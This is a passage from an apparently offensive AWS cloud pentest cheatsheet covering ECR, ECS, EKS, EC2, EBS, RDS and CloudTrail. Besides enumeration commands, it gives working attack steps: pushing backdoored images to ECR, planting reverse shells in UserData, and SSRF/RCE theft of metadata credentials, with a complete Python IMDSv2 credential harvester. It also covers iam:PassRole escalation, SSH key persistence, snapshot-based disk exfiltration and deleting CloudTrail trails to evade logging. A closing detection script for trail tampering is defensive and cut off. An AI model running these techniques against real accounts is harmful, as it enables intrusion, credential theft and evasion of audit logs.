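    _b64url("not-a-real-signature"),
])

if __name__ == "__main__":
    print(sa_identity(SAMPLE_TOKEN))
    print("\n".join(api_probe_commands(SAMPLE_TOKEN)))
```

<p>A 403 on the secrets request means RBAC is doing its job for this service account; a 200 means the cluster’s secrets in that namespace (and often the credentials for everything else) are ours. Node credentials are a separate story: the kubelet’s own identity lives on the EC2 host, which is why the instance-metadata section below matters for EKS too.</p>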
<h2 id="enumeration-3">Enumeration</h2>
<h3 id="ecr">ECR</h3>
<h4 id="listing-all-repositories-in-container-registry">Listing all repositories in container registry</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr describe-repositories
</code></pre></div></div>
<h4 id="listing-information-about-repository-policy">Listing information about repository policy</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr get-repository-policy --repository-name name
</code></pre></div></div>
<h4 id="listing-all-images-in-a-specific-repository">Listing all images in a specific repository</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr list-images --repository-name name
</code></pre></div></div>
<h4 id="listing-information-about-an-image">Listing information about an image</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr describe-images --repository-name name --image-ids imageTag=name
</code></pre></div></div>
<h3 id="ecs">ECS</h3>
<h4 id="listing-all-ecs-clusters">Listing all ECS clusters</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs list-clusters
</code></pre></div></div>
<h4 id="listing-information-about-an-specific-cluster">Listing information about an specific cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs describe-clusters --cluster name
</code></pre></div></div>
<h4 id="listing-all-services-in-specified-cluster">Listing all services in specified cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs list-services --cluster name
</code></pre></div></div>
<h4 id="listing-information-about-an-specific-service">Listing information about an specific service</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs describe-services --cluster name --services name
</code></pre></div></div>
<ul>
<li>The events field shows recent deployment and scheduling events for the service (not the container logs; those go to the CloudWatch log group named in the task definition)</li>
</ul>
<h4 id="listing-tasks-in-specific-cluster">Listing tasks in specific cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs list-tasks --cluster name
</code></pre></div></div>
<h4 id="listing-information-about-an-specific-task">Listing information about an specific task</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs describe-tasks --cluster name --tasks taskArn
</code></pre></div></div>
<ul>
<li>Also shows network information (ENI, private IP, subnet), useful if trying to pivot</li>
</ul>
<h4 id="listing-all-containers-in-specified-cluster">Listing all containers in specified cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs list-container-instances --cluster name
</code></pre></div></div>
<h3 id="eks">EKS</h3>
<h4 id="listing-all-eks-clusters">Listing all EKS clusters</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks list-clusters
</code></pre></div></div>
<h4 id="listing-information-about-an-specific-cluster-1">Listing information about an specific cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks describe-cluster --name name
</code></pre></div></div>
<h4 id="listing-all-node-groups-in-specified-cluster">Listing all node groups in specified cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks list-nodegroups --cluster-name name
</code></pre></div></div>
<h4 id="listing-specific-information-about-a-node-group-in-a-cluster">Listing specific information about a node group in a cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks describe-nodegroup --cluster-name name --nodegroup-name name
</code></pre></div></div>
<h4 id="listing-fargate-in-specified-cluster">Listing Fargate in specified cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks list-fargate-profiles --cluster-name cluster-name
</code></pre></div></div>
<h4 id="listing-information-about-a-fargate-profile-in-a-cluster">Listing information about a fargate profile in a cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks describe-fargate-profile --cluster-name name --fargate-profile-name name
</code></pre></div></div>
<h2 id="persistence-1">Persistence</h2>
<ul>
<li>It’s possible to rebuild an existing image with a backdoor and push it back to ECR; every container started from that image will then call back to our team server.</li>
</ul>
<h3 id="enumerating-the-user">Enumerating the user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h3 id="listing-manager-policies-attached-to-the-iam-role">Listing managed policies attached to the IAM role</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-role-policies --role-name name
</code></pre></div></div>
<h3 id="getting-information-about-the-version-of-the-managed-policy">Getting information about the version of the managed policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn arn --version-id id
</code></pre></div></div>
<h3 id="getting-information-about-the-repositories-in-container-registry">Getting information about the repositories in container registry</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr describe-repositories
</code></pre></div></div>
<h3 id="listing-all-images-in-the-repository">Listing all images in the repository</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr list-images --repository-name name
</code></pre></div></div>
<h3 id="listing-information-about-an-image-1">Listing information about an image</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr describe-images --repository-name name --image-ids imageTag=Name
</code></pre></div></div>
<h3 id="authenticate-the-docker-daemon-to-ecr">Authenticate the docker daemon to ECR</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr get-login-password --region region | docker login --username AWS --password-stdin ecr_address
</code></pre></div></div>
<h3 id="building-images-with-backdoor">Building images with backdoor</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker build -t image_name .
</code></pre></div></div>
<h3 id="tagging-the-docker-image">Tagging the docker image</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker tag image_name ecr_address/repository_name:tag
</code></pre></div></div>
<ul>
<li>ecr_address is ACCOUNT_ID.dkr.ecr.REGION.amazonaws.com (the repositoryUri from describe-repositories already includes the repository name). Re-using a tag that is currently deployed (for example latest) means the next pull or task launch picks up our image with no change on the cluster side; if the repository has tag immutability enabled the push is rejected and a new tag is needed.</li>
</ul>
<h3 id="pushing-the-image-to-ecr">Pushing the image to ECR</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker push ecr_address/repository_name:tag
</code></pre></div></div>
<h1 id="ec2">EC2</h1>
<ul>
<li>AMI: the images used to create virtual machines</li>
<li>It’s possible to create a malicious image to compromise the users who launch instances from it</li>
<li>We can access an instance using SSH keys, EC2 Instance Connect or Session Manager</li>
<li>The SSH key method is permanent; we need to obtain the private key to connect to the instance</li>
<li>EC2 Instance Connect is IAM-controlled (ec2-instance-connect:SendSSHPublicKey): it pushes a public key of our choice to the instance for 60 seconds, long enough to open an SSH session with the matching private key</li>
<li>Session Manager (SSM) works from the console or from the CLI with the session-manager-plugin; it needs neither an SSH key nor an open inbound port, only the SSM agent and an instance role with SSM permissions</li>
<li>Windows machines can be accessed using RDP or Session Manager</li>
<li>Security Groups act as a virtual firewall controlling inbound and outbound traffic; they apply at the instance (ENI) level, not the subnet level (that is what network ACLs do)</li>
</ul>
<h2 id="enumeration-4">Enumeration</h2>
<h3 id="listing-information-about-all-instances">Listing information about all instances</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-region">Listing information about a specific region</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances --region region
</code></pre></div></div>
<h3 id="listing-information-about-specific-instance">Listing information about specific instance</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances --instance-ids ID
</code></pre></div></div>
<h3 id="extracting-userdata-attribute-of-specified-instance">Extracting UserData attribute of specified instance</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instance-attribute --attribute userData --instance-id instanceID
</code></pre></div></div>
<p><em>User data is the bootstrap script passed at launch and frequently contains commands, credentials or other secrets. The value (UserData.Value) comes back base64 encoded, so pipe it through base64 -d.</em></p>
<h3 id="listing-roles-of-an-instance">Listing roles of an instance</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-iam-instance-profile-associations
</code></pre></div></div>
<h2 id="exploitation-1">Exploitation</h2>
<ul>
<li>Initial access can happen by RCE or SSRF</li>
<li>Metadata can be used to exfiltrate information from the instance</li>
</ul>
<h3 id="remote-code-execution">Remote code execution</h3>
<h4 id="aws-metadata">AWS Metadata</h4>
<p>If we have remote code execution or SSRF, we can grab metadata information</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/meta-data
</code></pre></div></div>
<h5 id="grabbing-the-keys-to-access-the-instance">Grabbing the instance identity credentials</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
</code></pre></div></div>
<p><em>These are the credentials AWS itself uses for the instance identity role and they carry very limited permissions; the keys of the IAM role attached to the instance live under iam/security-credentials/ROLE_NAME (see Credential Access below).</em></p>
<h5 id="grabbing-the-keys-in-metadata-version-2">Grabbing the keys in metadata version 2 (IMDSv2)</h5>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") \
&& curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
</code></pre></div></div>
<ul>
<li>IMDSv2 needs the token on every request, and instances configured as IMDSv2-only answer the tokenless v1 requests above with 401. The PUT is also what defeats most SSRF primitives (they rarely let us pick the method or add a header), and the default hop limit of 1 stops the token response from reaching a container on a bridge network unless the limit was raised.</li>
</ul>
<h4 id="aws-userdata">AWS Userdata</h4>
<p>Version 1</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/user-data/
</code></pre></div></div>
<p>Version 2</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") \
&& curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/user-data/
</code></pre></div></div>
<h3 id="privilege-escalation-2">Privilege Escalation</h3>
<ul>
<li>One approach to get a shell on an instance is to put a reverse shell in the UserData attribute; user data runs as root on first boot, so we get the connection when an instance is launched with it (for an existing instance the attribute can only be modified while the instance is stopped: ec2:StopInstances, ec2:ModifyInstanceAttribute, ec2:StartInstances).</li>
<li>Another approach: with iam:PassRole plus EC2 rights such as ec2:AssociateIamInstanceProfile (the AmazonEC2FullAccess managed policy grants them), we can attach an instance profile carrying an administrator role to an EC2 instance we already execute code on, then pull that role’s keys from the metadata service and use any AWS service it allows.</li>
</ul>
<h4 id="getting-information-about-the-key">Getting information about the key</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h4 id="getting-policies-attached-to-the-iam-user">Getting policies attached to the IAM user</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name user_name
</code></pre></div></div>
<h4 id="getting-information-about-a-specific-policy-version">Getting information about a specific policy version</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn ARN --version-id ID
</code></pre></div></div>
<p>To attach a role to an EC2 instance, we can use the RCE to grab the ID</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/meta-data/instance-id
</code></pre></div></div>
<h4 id="listing-instance-profiles">Listing instance profiles</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-instance-profiles
</code></pre></div></div>
<h4 id="attach-an-instance-profile-to-an-ec2-instance">Attach an instance profile to an EC2 instance</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 associate-iam-instance-profile --instance-id ID --iam-instance-profile Name=ProfileName
</code></pre></div></div>
<h3 id="credential-access-1">Credential Access</h3>
<ul>
<li>We can grab the credentials by abusing metadata (Web Application with SSRF,RCE and so on)</li>
</ul>
<h4 id="after-the-initial-access">After the initial access</h4>
<ol>
<li>Enumerate the key (Role)</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<ol>
<li>If there are roles associated with the key, we can grab the credentials by issuing a request to the metadata endpoint (v1 or v2)</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PREVIOUS_COMMAND
</code></pre></div></div>
<ol>
<li>Configure the aws cli</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws configure
</code></pre></div></div>
<p>Or use environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN; the session token is mandatory for role credentials).</p>
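<p>The IMDSv2 commands above and the credential-access steps just listed, put together as one runnable flow. This is an added example, not code from the original cheatsheet: it performs the PUT-for-token handshake, walks iam/security-credentials/ to the attached role’s keys, pulls user-data and greps it for embedded secrets, and prints the export lines the CLI needs. The HTTP transport is a parameter, so the constructed fake below (role name, keys and user-data are all made up) exercises the same logic offline; on a real instance pass urllib_transport instead.</p>

```python
"""IMDSv2 credential harvesting from inside (or via a forwarding SSRF into) an
EC2 instance. Added example, not part of the original cheatsheet."""
import json
import re
import urllib.request

IMDS = "http://169.254.169.254"
TOKEN_TTL = "21600"  # seconds; six hours is the maximum IMDSv2 accepts


def urllib_transport(method, path, headers):
    """Real transport: use this when running on the instance itself."""
    req = urllib.request.Request(IMDS + path, method=method, headers=headers)
    with urllib.request.urlopen(req, timeout=2) as resp:
        return resp.status, resp.read().decode()


def imds_session(transport):
    """Do the IMDSv2 handshake and return a GET that carries the token."""
    status, token = transport("PUT", "/latest/api/token",
                              {"X-aws-ec2-metadata-token-ttl-seconds": TOKEN_TTL})
    if status != 200:
        raise RuntimeError("token request failed: IMDS disabled or hop limit hit")

    def get(path):
        status, body = transport("GET", path, {"X-aws-ec2-metadata-token": token})
        if status != 200:
            raise RuntimeError(f"{path}: HTTP {status}")
        return body
    return get


def harvest(transport):
    """Return (role name, credentials dict, user-data text)."""
    get = imds_session(transport)
    # Listing the directory yields the role name; the role name yields the keys.
    role = get("/latest/meta-data/iam/security-credentials/").strip()
    creds = json.loads(get(f"/latest/meta-data/iam/security-credentials/{role}"))
    # IMDS serves user-data as plain text (only the CLI returns it base64-encoded).
    return role, creds, get("/latest/user-data/")


def export_lines(creds):
    """Shell lines that make the AWS CLI use the stolen role credentials.
    The session token is mandatory: these are temporary STS keys (ASIA...)."""
    return [f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}",
            f"export AWS_SECRET_ACCESS_KEY={creds['SecretAccessKey']}",
            f"export AWS_SESSION_TOKEN={creds['Token']}"]


SECRET_PATTERNS = [re.compile(r"AKIA[0-9A-Z]{16}"),  # long-term access key IDs
                   re.compile(r"(?i)(password|secret|token)\s*[=:]\s*\S+")]


def find_secrets(text):
    """Crude grep for the material bootstrap scripts tend to embed."""
    return [m.group(0) for p in SECRET_PATTERNS for m in p.finditer(text)]


# --- constructed IMDS responder so the flow runs without an EC2 instance ---
FAKE_TOKEN = "AQAAAconstructed-token"
FAKE_ROLE = "WebAppRole"
FAKE_CREDS = {"Code": "Success", "Type": "AWS-HMAC",
              "AccessKeyId": "ASIAEXAMPLEEXAMPLE01",
              "SecretAccessKey": "constructedSecretKey",
              "Token": "constructedSessionToken",
              "Expiration": "2022-10-05T23:00:00Z"}
FAKE_USER_DATA = "#!/bin/bash\nexport DB_PASSWORD=hunter2\naws s3 sync s3://app-cfg /srv\n"


def fake_transport(method, path, headers):
    """Behaves like an IMDSv2-only instance: no token, no data."""
    if method == "PUT" and path == "/latest/api/token":
        ok = "X-aws-ec2-metadata-token-ttl-seconds" in headers
        return (200, FAKE_TOKEN) if ok else (400, "")
    if headers.get("X-aws-ec2-metadata-token") != FAKE_TOKEN:
        return 401, ""
    routes = {"/latest/meta-data/iam/security-credentials/": FAKE_ROLE + "\n",
              f"/latest/meta-data/iam/security-credentials/{FAKE_ROLE}": json.dumps(FAKE_CREDS),
              "/latest/user-data/": FAKE_USER_DATA}
    return (200, routes[path]) if path in routes else (404, "")


if __name__ == "__main__":
    role, creds, user_data = harvest(fake_transport)  # urllib_transport on a real box
    print("role:", role)
    print("\n".join(export_lines(creds)))
    print("user-data secrets:", find_secrets(user_data))
```

<p>The fake responder rejects tokenless GETs the way an IMDSv2-only instance does, so if the same code is pointed at a box where the handshake is blocked (SSRF without header control, container hop limit) it fails at imds_session rather than silently returning nothing. The keys expire at the Expiration time in the JSON; re-run the harvest before then.</p>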
<h3 id="persistence-2">Persistence</h3>
<ul>
<li>All the usual Linux persistence techniques work here: SSH keys, vim backdoor and so on.</li>
</ul>
<h4 id="ssh-persistence-example">SSH Persistence example</h4>
<ol>
<li>Generate SSH Key pair</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh-keygen
</code></pre></div></div>
<ol>
<li>Add public key to authorized_keys</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo "PUBLIC_Key" >> /home/user/.ssh/authorized_keys
</code></pre></div></div>
<ol>
<li>Use the private key to connect</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh -i private_key user@instance
</code></pre></div></div>
<h1 id="elastic-block-store">Elastic Block Store</h1>
<ul>
<li>Block storage used to hold persistent data</li>
<li>Volumes are attached to EC2 instances as disks (like a hard drive, but resizable)</li>
<li>A snapshot can be taken of a volume (stored in S3, managed by AWS) and a new volume created from that snapshot</li>
<li>The snapshot (backup of the EBS volume) can therefore be attached, via a new volume, to any EC2 instance in the same availability zone</li>
<li>Snapshots can be turned into volumes or registered as AMIs</li>
</ul>
<h2 id="enumeration-5">Enumeration</h2>
<h3 id="enumerating-ebs-volumes">Enumerating EBS volumes</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-volumes
</code></pre></div></div>
<ul>
<li>If the volume is available, it can be attached to an EC2 instance</li>
<li>Check if the EBS is encrypted</li>
</ul>
<h3 id="enumerating-snapshots">Enumerating Snapshots</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-snapshots --owner-ids self
</code></pre></div></div>
<ul>
<li>Also check if the snapshot is encrypted</li>
</ul>
<h2 id="exploitation--data-exfiltration">Exploitation & Data Exfiltration</h2>
<ul>
<li>Create a snapshot of an EC2 instance’s volume, create a volume from the snapshot and attach it to another EC2 instance.</li>
<li>The user needs the corresponding IAM permissions on EC2</li>
<li>We may not have the right to access the instance but still have the rights to create a snapshot and attach it to another machine.</li>
</ul>
<h3 id="creating-a-snapshot-of-a-specified-volume">Creating a snapshot of a specified volume</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 create-snapshot --volume volumeID --description "Example" --profile profile_name
</code></pre></div></div>
<h3 id="listing-snapshots">Listing snapshots</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-snapshots
</code></pre></div></div>
<h3 id="creating-a-volume-from-a-snasphot">Creating a volume from a snapshot</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 create-volume --snapshot-id ID --availability-zone ZONE --profile profile_name
</code></pre></div></div>
<ul>
<li>The volume needs to be in the same availability zone as the instance we have access</li>
</ul>
<h3 id="attaching-the-volume-to-an-instance">Attaching the volume to an instance</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/sdfd   # the device name can be another value
</code></pre></div></div>
<h3 id="mounting-the-volume">Mounting the volume</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo mount /dev/sdfd /directory
</code></pre></div></div>
<p>After mounting, we will have access to the disk.</p>
<h1 id="rds---relational-database-service">RDS - Relational Database Service</h1>
<ul>
<li>Service to run, operate and scale relational databases in AWS (MariaDB, MySQL and similar)</li>
<li>Access is done using a password, password + IAM or password + Kerberos</li>
<li>It’s possible to restrict access at the identity level (a specific EC2 instance or Lambda) or at the network level (VPC, IP).</li>
<li>RDS Proxy handles the traffic between the application and the database; it enables enforcing IAM permissions and uses Secrets Manager to store credentials.</li>
</ul>
<h2 id="enumeration-6">Enumeration</h2>
<h3 id="listing-information-about-clusters-in-rds">Listing information about clusters in RDS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-clusters
</code></pre></div></div>
<h3 id="listing-information-about-rds-instances">Listing information about RDS instances</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-instances
</code></pre></div></div>
<ul>
<li>IAMDatabaseAuthenticationEnabled: false -> A password is needed to access the instance</li>
</ul>
<h3 id="listing-information-about-subnet-groups-in-rds">Listing information about subnet groups in RDS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-subnet-groups
</code></pre></div></div>
<h3 id="listing-information-about-database-security-groups-in-rds">Listing information about database security groups in RDS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-security-groups
</code></pre></div></div>
<h3 id="listing-information-about-database-proxies">Listing information about database proxies</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-proxies
</code></pre></div></div>
<h2 id="data-exfiltration-1">Data exfiltration</h2>
<ul>
<li>If the instance is in a security group or VPC, we need to compromise that first to access the database (for example, if we compromise an EC2 instance in the same VPC, it’s possible to connect from there)</li>
</ul>
<h3 id="list-instances-in-rds">List instances in RDS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-instances
</code></pre></div></div>
<h3 id="list-information-about-the-specified-security-group">List information about the specified security group</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-security-groups --group-ids id
</code></pre></div></div>
<h3 id="password-based-authentication">Password based authentication</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql -h hostname -u name -P port -p
</code></pre></div></div>
<ul>
<li><code class="language-plaintext highlighter-rouge">-p</code> without a value prompts for the password; <code class="language-plaintext highlighter-rouge">-p password</code> (with a space) would be read as the database name</li>
</ul>
<h3 id="iam-based-authentication">IAM Based authentication</h3>
<p><strong>1. Identify the user</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<p><strong>2. List all policies attached to a role</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-role-policies --role-name name
</code></pre></div></div>
<p><strong>3. Get information about a specific version of a policy</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn arn --version-id ID
</code></pre></div></div>
<p><strong>4. Get a temporary token from the RDS</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds generate-db-auth-token --hostname hostname --port port --username username --region region
</code></pre></div></div>
<ul>
<li>To be easier, we can put it in a variable</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --username username --region region)
</code></pre></div></div>
<p><strong>5. Connect to the DB using the token</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql -h hostname -P port --user=username --password=$TOKEN --enable-cleartext-plugin --ssl-ca=global-bundle.pem
</code></pre></div></div>
<ul>
<li>IAM authentication requires a TLS connection, so the RDS CA bundle (<code class="language-plaintext highlighter-rouge">global-bundle.pem</code>) is passed with <code class="language-plaintext highlighter-rouge">--ssl-ca</code></li>
</ul>
<h1 id="sso--other-services">SSO & Other Services</h1>
<h2 id="single-sign-on-sso">Single Sign On (SSO)</h2>
<ul>
<li>Used to centrally manage access to multiple AWS accounts and applications.</li>
<li>Provide users a way to interact with all services and applications through one place</li>
<li>Can be used to manage access and user permissions to all AWS accounts</li>
<li>The identity source can use AWS SSO’s identity store or external identity store (Okta,SAML and similar)</li>
</ul>
<h2 id="cloudtrail">CloudTrail</h2>
<ul>
<li>Log monitoring service that allows us to continuously monitor and retain account activity related to actions in our AWS account</li>
<li>Provides an event history of AWS account activity made through the console, SDKs, command line tools and other services</li>
<li>Commonly used to detect unusual behavior in an AWS account</li>
<li>Pacu automatically changes the user agent to deceive the logs of CloudTrail</li>
</ul>
<h3 id="userful-commands">Useful Commands</h3>
<h4 id="list-trails">List trails</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws cloudtrail list-trails
</code></pre></div></div>
<h4 id="disabling-cloudtrail">Disabling CloudTrail</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws cloudtrail delete-trail --name example_trail --profile name
</code></pre></div></div>
<h4 id="disable-monitoring-of-events-from-global-events">Disable logging of global service events</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws cloudtrail update-trail --name example_trail --no-include-global-service-events
</code></pre></div></div>
<h4 id="disable-cloudtrail-on-specific-regions">Restrict CloudTrail to a single region</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws cloudtrail update-trail --name example_trail --no-include-global-service-events --no-is-multi-region-trail --region eu-west-1
</code></pre></div></div>
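<p>Each of the three commands above leaves its own CloudTrail record (<code class="language-plaintext highlighter-rouge">DeleteTrail</code>, <code class="language-plaintext highlighter-rouge">UpdateTrail</code> with the scope flags turned off), and the bullet about Pacu spoofing the user agent suggests a second signal: a principal suddenly calling the API with a client string it never used before. The script below is an added example, not part of the original cheatsheet, showing both checks over constructed CloudTrail events. The event dictionaries follow the shape of real CloudTrail records (a subset of fields; the <code class="language-plaintext highlighter-rouge">requestParameters</code> keys mirror the CloudTrail API’s parameter names), while the account, principal, times and user agents are made up, as is the per-principal baseline of known user agents.</p>

```python
# Constructed CloudTrail records (subset of fields); values are made up.
SAMPLE_EVENTS = [
    {"eventTime": "2022-10-05T17:11:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "DescribeInstances",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/deploy"},
     "userAgent": "aws-cli/2.7.0 Python/3.9.11 Linux/5.10",
     "requestParameters": {}},
    {"eventTime": "2022-10-05T17:12:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "UpdateTrail",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/deploy"},
     "userAgent": "aws-cli/1.16.215 Python/2.7.16 Linux/4.19",
     "requestParameters": {"name": "example_trail",
                           "includeGlobalServiceEvents": False,
                           "isMultiRegionTrail": False}},
    {"eventTime": "2022-10-05T17:13:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DeleteTrail",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/deploy"},
     "userAgent": "aws-cli/1.16.215 Python/2.7.16 Linux/4.19",
     "requestParameters": {"name": "example_trail"}},
]

# Constructed baseline: user agents each principal is known to use.
# In practice this is built from weeks of historic CloudTrail data.
KNOWN_AGENTS = {
    "arn:aws:iam::123456789012:user/deploy": {"aws-cli/2.7.0 Python/3.9.11 Linux/5.10"},
}


def classify_event(event):
    """Reasons an event deserves an alert; an empty list means nothing notable."""
    reasons = []
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    if name in ("DeleteTrail", "StopLogging"):
        reasons.append(f"{name}: trail logging removed")
    elif name == "UpdateTrail":
        # The scope-reducing flags from the commands above show up as booleans.
        if params.get("includeGlobalServiceEvents") is False:
            reasons.append("UpdateTrail: global service events disabled")
        if params.get("isMultiRegionTrail") is False:
            reasons.append("UpdateTrail: trail narrowed to a single region")
    principal = (event.get("userIdentity") or {}).get("arn", "")
    agent = event.get("userAgent", "")
    if principal in KNOWN_AGENTS and agent not in KNOWN_AGENTS[principal]:
        reasons.append(f"unusual user agent for {principal.rsplit('/', 1)[-1]}: {agent}")
    return reasons


def scan(events):
    """Flatten alerts to (time, eventName, reason) tuples, in log order."""
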